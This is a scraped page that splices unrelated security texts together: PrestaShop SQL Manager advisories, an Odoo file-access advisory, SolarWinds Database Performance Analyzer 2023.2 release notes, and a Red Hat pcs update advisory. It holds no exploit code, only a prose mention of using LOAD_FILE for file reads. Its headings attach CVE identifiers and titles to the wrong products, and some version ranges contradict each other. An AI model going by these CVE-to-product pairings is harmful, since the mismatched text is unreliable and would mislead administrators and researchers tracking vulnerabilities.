This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2023-23839: SolarWinds Platform 2023.2 Release Notes

### Impact
SQL filtering vulnerability, a BO user can write, update and delete in the database, even without having specific rights.

### Patches
PrestaShop 8.0.4 and 1.7.8.9 will contain the patch.

### Workarounds
no

### References
no


**SQL filter bypass leading to arbitrary write requests using "SQL Manager"**

Critical severity GitHub Reviewed Published Apr 25, 2023 in PrestaShop/PrestaShop • Updated Apr 25, 2023

GHSA-p379-cxqh-q822: SQL filter bypass leading to arbitrary write requests using "SQL Manager"

PrestaShop is an Open Source e-commerce web application. Versions prior to 8.0.4 and 1.7.8.9 contain a SQL filtering vulnerability. A BO user can write, update, and delete in the database, even without having specific rights. PrestaShop 8.0.4 and 1.7.8.9 contain a patch for this issue. There are no known workarounds.

**Package**

composer prestashop/prestashop (Composer)

**Affected versions**

< 8.0.4

**Patched versions**

8.0.4, 1.7.8.9

**Description**

**Impact**

SQL filtering vulnerability, a BO user can write, update and delete in the database, even without having specific rights.

**Patches**

PrestaShop 8.0.4 and 1.7.8.9 will contain the patch.

**Workarounds**

no

**References**

no

CVE-2023-30839: SQL filter bypass leading to arbitrary write requests using "SQL Manager"

A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to read and write local files on the server.

**Security Advisory - CVE-2021-23166**

**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)  
**CVE ID**: CVE-2021-23166  
**Component**: Core  
**Credits**: Nils Hamerlinck (Trobz)

A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise  
15.0 and earlier allows authenticated administrators to read and write  
local files on the server.

**I. Background**

Odoo uses the Python library psycopg2 to interact with the PostgreSQL database.

**II. Problem Description**

The pyscopg2 library could be abused to access the local files of the server  
running the Odoo instance.

**III. Impact**

**Attack Vector**: Network exploitable  
**Authentication**: Privileged user account required  
**CVSS3 Score**: high :: 8.7  
**CVSS3 Vector**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

A malicious administrator might be able to read or modify sensitive files stored  
on the server such as protected configuration secrets.

Systems who host Odoo databases for untrusted users are particularly at risk,  
(e.g. SaaS platforms), as they typically allow users to become administrators  
of their own Odoo database. This is sufficient to exploit the vulnerability.

Odoo S.A. is not aware of any use of this vulnerability in the wild.

**IV. Workaround**

No workaround is available, updating to the latest revision or applying the  
corresponding patch is strongly recommended.

Odoo Cloud servers have been patched as soon as the correction was available.

**V. Solution**

Update to the latest revision, either via GitHub or by downloading it:  
https://www.odoo.com/page/download  
If updating is not an option, you may instead apply the patch corresponding  
to your Odoo installation (links provided below).

For the actual update procedure, please refer to our update instructions, valid  
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html

**VI. Correction details**

The following list contains the patches that fix the vulnerability for  
each version:

*   13.0: c306ce2
*   14.0: 1f1e03f
*   15.0: 0122cb3
*   15.0-ent, 14.0-ent, 13.0-ent (Enterprise): see 15.0, 14.0 and 13.0.

CVE-2021-23166: [SEC] CVE-2021-23166 - A sandboxing issue in Odoo Community 15.0 and... · Issue #107687 · odoo/odoo

No exception handling vulnerability which revealed sensitive or excessive information to users.

Release date: April 18, 2023

These release notes describe the new features, improvements, and fixed issues in Database Performance Analyzer 2023.2. They also provide information about upgrades and describe workarounds for known issues.

**Learn more**

*   For information on the latest hotfixes, see DPA hotfixes.
*   For information about requirements, see DPA system requirements.
*   For information about working with DPA, see the DPA Administrator Guide.

**New features and improvements in DPA**

Return to top

DPA 2023.2 includes the following changes.

**Additions to systems requirements and monitored instances**

 

Category

Vender and version

Repository database

Amazon RDS for MySQL 8.0

Monitored database instances

EDB Postgres 14

For more information, see the DPA 2023.2 system requirements and Database instances DPA can monitor.

**Security enhancements**

DPA 2023.2 includes security enhancements, including:

*   **HTTPS connections are now required.**
    
    To improve security, DPA 2023.2 accepts only HTTPS connections. Any attempts to connect using the HTTP connector port are automatically redirected to the HTTPS connector port.
    
    If you are upgrading from a previous version, please complete the tasks under Before you upgrade to ensure that all users can access DPA and that DPA Central can connect to all DPA servers.
    
*   **Tomcat and MS JDBC Driver are upgraded.**
    
    DPA now includes Tomcat 8.5.85 and MS JDBC Driver 12.2.0.
    

**Support for SAML authentication with Azure AD as the identity provider**

To configure DPA to use SAML authentication with Azure AD as the identity provider, see this topic.

**Fixed issues**

Return to top

DPA 2023.2 fixes the following issues.

 

Case number

Description

01206958, 01245439, 01265950

When DPA is monitoring a database instance on a VM with a large number of disks, the vSphere cleaner job runs as expected and cleans VM disk metrics for each granularity (seconds, 10 minutes, hours, days). This job removes old data from the DPA repository database, which prevents the repository from growing at a high rate and consuming excessive space and memory on the repository server.

01190371

Monitoring a Sybase database instance no longer fails with the error Monitor attempting to start - see log.

00960237

Monitoring an Oracle database instance no longer fails with the error Monitor for database [DB_name] failed in job [TextPollJob] due to [Underlying datasource has not been set.].

01200056

Configuring an Azure SQL DB repository database no longer fails because of missing properties. DPA automatically adds the required JDBC URL properties in the Advanced Connection Properties dialog box.

01105926, 01183265, 01225013, 01234101, 01241730

Health, connection status, and other data about monitored SQL Server Availability Groups (AGs) is updated as expected in the Availability Group Summary view.

01256667

When you are registering a database instance for monitoring and the com.confio.ignite.jdbc.sqlserver.useJtdsDriver property value is set to true in the system.properties file, DPA honors this setting and uses the jTDS JDBC driver.

01235456

DPA sorts index advisors based on the estimated time savings, listing advisors with the largest estimated savings first.

01179091, 01235460

DPA index advisors no longer display estimates savings percentages that are greater than 100%. When DPA detects that information from the database vendor is inconsistent, DPA displays 'Unknown'. For more information, see this KB article.

01183457, 01191341, 01194479, 01217066, 01311041

DPA index analysis no longer fails with errors such as Unable to run index analysis or Out of range value for column 'CARDINALITY' in the logs, and it no longer shows no recommendation when the table advisor recommends indexes.

01174998, 01179091

This release fixes an issue that caused DPA index advisors to recommend creating indexes that already existed or to create indexes that included table columns that did not exist.

01181748

DPA index analysis recommendations are no longer displayed one day and then missing the next even though the recommended indexes were not created.

01142556, 01166969, 01172735, 01273937

When deadlock alerts occur, DPA lists the deadlocks on the Deadlocks tab.

**SolarWinds CVEs**

   

CVE-ID

Vulnerability Title

Description

Severity

CVE-2023-23837

No Exception Handling Vulnerability

No exception handling vulnerability which revealed sensitive or excessive information to users.

Medium

CVE-2023-23838

Directory traversal and file enumeration vulnerability

Directory traversal and file enumeration vulnerability which allowed users to enumerate to different folders of the server.

Medium

**Third-party CVEs**

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

   

CVE-ID

Vulnerability Title

Description

Severity

CVE-2020-26870

URL redirection vulnerability

Due to vulnerable Swagger UI version 3.27.0, URL redirection was possible, which can help attackers modify a URL and redirect a user to any other malicious site.

High

**New customer installation**

Return to top

For information about installing DPA, see the DPA Installation and Upgrade Guide. You can download a free trial from the SolarWinds website.

**Before you upgrade!**

DPA 2023.2 includes fixes that might require changes to your DPA deployment. Before you upgrade, determine if you need to make the following changes:

*   If any users access DPA using HTTP (instead of HTTPS), redirect connection attempts that use the HTTP connector port.
    
*   If DPA Central is configured to access any DPA servers using HTTP, update the connection definitions.
    
*   If you monitor Db2 instances, update the permissions of the DPA monitoring user for each Db2 instance.
    

You can make these changes either before or after an upgrade. However, to ensure DPA availability and to avoid any gaps in monitoring Db2 instances, SolarWinds recommends making them **before** you upgrade to 2023.2.

**Redirect connection attempts that use the HTTP connector port**

To ensure that DPA is available to users who previously connected over HTTP, update the server.xml file to redirect traffic to the HTTP connector port (8123 by default) to the HTTPS/SSL connector port (8124 by default).

If the redirect is **not** added and users attempt to connect over HTTP after the upgrade, they will receive a message that the site can't be reached.

1.  Open the following file in a text editor:
    
    _DPA-install-dir_\iwc\tomcat\conf\server.xml
    
2.  Locate the Connector property below <!--HTTPS/SSL connector>, and note the port value. (By default, this is 8124.)
    
3.  Locate the Connector property below <!--HTTP connector>. Within the Connector property, add the following, where hpptsPortNumber is the port value noted in the previous step:
    
    redirectPort="hpptsPortNumber"
    
    For example:
    
    redirectPort="8124"
    
4.  If you make these changes after the upgrade, restart DPA for the changes to take effect.
    

**Update DPA Central connections to DPA servers**

If you use DPA Central, ensure that it is configured to connect to all DPA servers over HTTPS.

1.  Determine if DPA Central is configured to connect to any DPA servers over HTTP:
    
    1.  From the DPA menu in the upper-right corner, click Central.
        
    2.  Click Manage Central.
        
    3.  Verify that every server has a lock in the SSL column. If a server's SSL column does not display a lock, DPA Central is configured to connect to that server over HTTP.
        
2.  If one or more servers are configured to use HTTP, update each server's connection properties:
    
    1.  In the Registered Servers list, click the server's display name to open the Edit Server dialog.
        
    2.  Change the Port value to the port used for HTTPS connections (8124 by default).
        
    3.  Select SSL.
        
    4.  Click Save.
        

**Update the permissions of the DPA monitoring user for each Db2 instance**

DPA 2023.2 replaces six of the deprecated SNAP* functions that previous DPA versions used to monitor Db2 database instances. Because of this change, the DPA monitoring user requires additional privileges to monitor a Db2 instance. In addition to SYSADM permissions, the user requires EXECUTE privileges on certain tables. To monitor Db2 instances with DPA 2023.2 and later versions, modify the monitoring user's permission on each Db2 instance.

The required permissions can be granted in Db2 10.1 and later. DPA does not support monitoring earlier versions of Db2.

1.  Run the following commands to grant the DPA monitoring user EXECUTE privileges on the required tables:
    
        grant execute on function SYSPROC.MON_GET_DATABASE to userName;
        grant execute on function SYSPROC.MON_SAMPLE_WORKLOAD_METRICS to userName;
        grant execute on function SYSPROC.MON_GET_ACTIVITY to <USER_NAME>;
        grant execute on function SYSPROC.MON_GET_BUFFERPOOL to <USER_NAME>;
        grant execute on function SYSPROC.MON_GET_TABLESPACE to <USER_NAME>;
        grant execute on function SYSPROC.MON_GET_TRANSACTION_LOG to <USER_NAME>;
    
2.  To verify that the permissions were applied correctly, run the following command:
    
        select substr(authid,1,20) as authid
            , authidtype
            , privilege
            , grantable
            , substr(objectschema,1,12) as objectschema
            , substr(objectname,1,30) as objectname
            , objecttype
        from sysibmadm.privileges
        where objectschema ='SYSPROC' AND AUTHID='<USER_NAME>';
    

**How to upgrade**

If you are upgrading from an earlier version, use the following resources to plan and implement your upgrade:

*   Use the DPA Installation and Upgrade Guide to help you plan and execute your upgrade.
*   When you are ready, download the upgrade package from the SolarWinds Customer Portal.

**Known issues**

Return to top

 

Intermittent connection issues when monitoring IBM Db2 instances

**Issue**

When DPA monitors IBM Db2 instances, DPA is sometimes unable to connect to the instances. This occurs because DPA uses SNAP* functions to collect information from Db2 instances, and these functions have been deprecated by IBM.

In 2023.2 release most of the deprecated functions have been migrated. Please upgrade to 2023.2 and refer the KB for required permissions to monitor db2 in DPA.

NOTE: Migration has not been fully done in 2023.2 release. would be released soon with next deliverables.

**Resolution or Workaround**

None.

DPA 2023.2 replaces six of the deprecated SNAP* functions used in earlier DPA versions. The remaining SNAP* functions will be replaced in an upcoming release.

Because of this change, when you upgrade to DPA 2023.2, you must update the permissions of the DPA monitoring user for each Db2 instance.

 

REST API does not work when you access DPA with SAML login credentials

**Issue**

If you access DPA with SAML login credentials and you generate a refresh token, the following message is displayed when you attempt to use that refresh token to access the REST API:

You are not authorized to perform this action. Contact your DPA administrator.

**Resolution or Workaround**

Access DPA with a local login when you generate the refresh token.

 

Importing an alert definition without the associated database assignment rule

**Issue**

In some situations, the log file shows the status of an imported alert definition as both Imported and Failed. This occurs when the alert definition uses a database assignment rule, but the rule was not imported and did not already exist on the server.

The two statuses indicate that the alert definition was imported but the attempt to associate the database assignment rule failed.

**Resolution or Workaround**

When you import an alert definition that uses a database assignment rule, either import the rule or ensure that it already exists on the server.

If you imported an alert definition and the associated rule is missing, you must edit the alert definition to specify the database instances. (You can specify instances by manually selecting them or by applying a rule.)

**End of life**

Return to top

   

Version

EoL Announcement

EoE Effective Date

EoL Effective Date

DPA 2022.2

**April 18, 2023** End-of-Life (EoL) announcement - Customers on DPA version 2022.2 or earlier should begin transitioning to the latest version of DPA.

**August 18, 2023** End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for DPA version 2022.2 or earlier will no longer actively be supported by SolarWinds.

**April 18, 2024** End-of-Life (EoL) - SolarWinds will no longer provide technical support for DPA version 2022.2 or earlier.

DPA 2022.1

**January 18, 2023** End-of-Life (EoL) announcement - Customers on DPA version 2022.1 or earlier should begin transitioning to the latest version of DPA.

**April 18, 2023** End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for DPA version 2022.1 or earlier will no longer actively be supported by SolarWinds.

**April 18, 2024** End-of-Life (EoL) - SolarWinds will no longer provide technical support for DPA version 2022.1 or earlier.

DPA 2021.3

**October 18, 2022** End-of-Life (EoL) announcement - Customers on DPA version 2021.3 or earlier should begin transitioning to the latest version of DPA.

**January 18, 2023** End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for DPA version 2021.3 or earlier will no longer actively be supported by SolarWinds.

**January 18, 2024** End-of-Life (EoL) - SolarWinds will no longer provide technical support for DPA version 2021.3 or earlier.

DPA 2021.1

**October 18, 2022** End-of-Life (EoL) announcement - Customers on DPA version 2021.1 or earlier should begin transitioning to the latest version of DPA.

**January 18, 2023** End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for DPA version 2021.1 or earlier will no longer actively be supported by SolarWinds.

**January 18, 2024** End-of-Life (EoL) - SolarWinds will no longer provide technical support for DPA version 2021.1 or earlier.

DPA 2020.2

**October 18, 2022** End-of-Life (EoL) announcement - Customers on DPA version 2020.2 or earlier should begin transitioning to the latest version of DPA.

**January 18, 2023** End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for DPA version 2020.2 or earlier will no longer actively be supported by SolarWinds.

**January 18, 2024** End-of-Life (EoL) - SolarWinds will no longer provide technical support for DPA version 2020.2 or earlier.

See the End of Life Policy for information about SolarWinds product life cycle phases. For supported versions and EoL announcements for all SolarWinds products, see Currently supported software versions.

**Deprecation notices**

Return to top

This version of Database Performance Analyzer deprecates the following platforms and features.

Deprecated platforms and features are still supported in the current release. However, they will be unsupported in a future release. Plan on upgrading deprecated platforms, and avoid using deprecated features. 

 

Type

Details

DPA server OS

Installing DPA on a server with a **Windows Server 2012 R2** operating system is still supported in 2023.2, but support will be removed in an upcoming release.

**Legal notices**

Return to top

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2023-23837: DPA 2023.2 Release Notes

PrestaShop is an Open Source e-commerce web application. Prior to versions 8.0.4 and 1.7.8.9, it is possible for a user with access to the SQL Manager (Advanced Options -> Database) to arbitrarily read any file on the operating system when using SQL function `LOAD_FILE` in a `SELECT` request. This gives the user access to critical information. A patch is available in PrestaShop 8.0.4 and PS 1.7.8.9


**Package**

composer prestashop/prestashop (Composer)

**Affected versions**

< 8.0.3

**Patched versions**

8.0.4 and 1.7.8.9

**Description**

**Impact**

It is possible for a user having access to the SQL Manager (Advanced Options -> Database) to arbitrary read any file on the Operating system when using SQL function LOAD\_FILE in a SELECT request. So It can access to critical information.

**Patches**

The patch will be on PS 8.0.4 and PS 1.7.8.9

CVE-2023-30545: Arbitrary file read

Red Hat Security Advisory 2023-1961-01 - The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: pcs security and bug fix update  
Advisory ID:       RHSA-2023:1961-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1961  
Issue date:        2023-04-25  
CVE Names:         CVE-2023-27530 CVE-2023-27539  
====================================================================  
1. Summary:

An update for pcs is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux High Availability EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Resilient Storage EUS (v.8.4) - ppc64le, s390x, x86_64

3. Description:

The pcs packages provide a command-line configuration system for the  
Pacemaker and Corosync utilities.

Security Fix(es):

* rubygem-rack: Denial of service in Multipart MIME parsing  
(CVE-2023-27530)

* rubygem-rack: denial of service in header parsing (CVE-2023-27539)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Command 'pcs config checkpoint diff' does not show configuration  
differences between checkpoints (BZ#2180703)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2176477 - CVE-2023-27530 rubygem-rack: Denial of service in Multipart MIME parsing  
2179649 - CVE-2023-27539 rubygem-rack: denial of service in header parsing  
2180703 - Command 'pcs config checkpoint diff' does not show configuration differences between checkpoints [rhel-8.4.0.z]

6. Package List:

Red Hat Enterprise Linux High Availability EUS (v.8.4):

Source:  
pcs-0.10.8-1.el8_4.4.src.rpm

aarch64:  
pcs-0.10.8-1.el8_4.4.aarch64.rpm  
pcs-snmp-0.10.8-1.el8_4.4.aarch64.rpm

ppc64le:  
pcs-0.10.8-1.el8_4.4.ppc64le.rpm  
pcs-snmp-0.10.8-1.el8_4.4.ppc64le.rpm

s390x:  
pcs-0.10.8-1.el8_4.4.s390x.rpm  
pcs-snmp-0.10.8-1.el8_4.4.s390x.rpm

x86_64:  
pcs-0.10.8-1.el8_4.4.x86_64.rpm  
pcs-snmp-0.10.8-1.el8_4.4.x86_64.rpm

Red Hat Enterprise Linux Resilient Storage EUS (v.8.4):

Source:  
pcs-0.10.8-1.el8_4.4.src.rpm

ppc64le:  
pcs-0.10.8-1.el8_4.4.ppc64le.rpm  
pcs-snmp-0.10.8-1.el8_4.4.ppc64le.rpm

s390x:  
pcs-0.10.8-1.el8_4.4.s390x.rpm  
pcs-snmp-0.10.8-1.el8_4.4.s390x.rpm

x86_64:  
pcs-0.10.8-1.el8_4.4.x86_64.rpm  
pcs-snmp-0.10.8-1.el8_4.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-27530  
https://access.redhat.com/security/cve/CVE-2023-27539  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEe/NtzjgjWX9erEAQiymRAAh7wVvEGzqhsCs1XGuq0lSzudo1boptSw  
PXKzaJampR25ecUOMs8QDELxNUuqsBbb1aDX3Y3oBLy3XEdkJb1sMErXCD1meOVH  
wDOP2GKuMO4YjwruV6QGZlgOhCtTpsvuvHYRGS6m6qiuvfSQlqmeofVwq/eUT3Kg  
SI4Ig8aNUOg3agF8YdSRVtrJZf+BfjZjjaldWSr/bWbHz2SgjTkJ/ZHCZ4UUCcgB  
L8Mi4pq4XDxXmLwJOguhOcEWKf8Y40X4sNPceOcV2WnPtH1FoyTy3Tck6Z4/lPh1  
MYVfuWlEuX0iwKMJ+rpW1NzOWML0Uc5P7MVb3br9XLgHvTpJa1v3LEwbBGBTHyzb  
E+E0Z/EhMqKsb3KL+VczTGXgznPH4g6lby/mlRwXI5HYBAu/2JVJU/awDHE+RQlb  
Xeux9vthG2Ncztfls8NMRE2/JLMV8sxWqYSPq3lmPxw7NwISvVE0NGDyu1ijEDBL  
6Q0yj0/kFCJx584uEAVXFFIDYLBIaiBB+bZNoGbDLDt/zjKXaeM/wFEHfFyI2yNp  
S8fCc4NxbhB2fE1Uqvpanxj54N4yVoqWYPSJLWd8AIvsaug6VbwhjDgncsNZZJCB  
D7Mg9eWqy6EF4nZ5wZVMOUoDlf/rF+Pk+SjOgE2phMPEXsAbfudMbPaEck1jCtMt  
KOfyPN8GR8I=l8Fw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#sql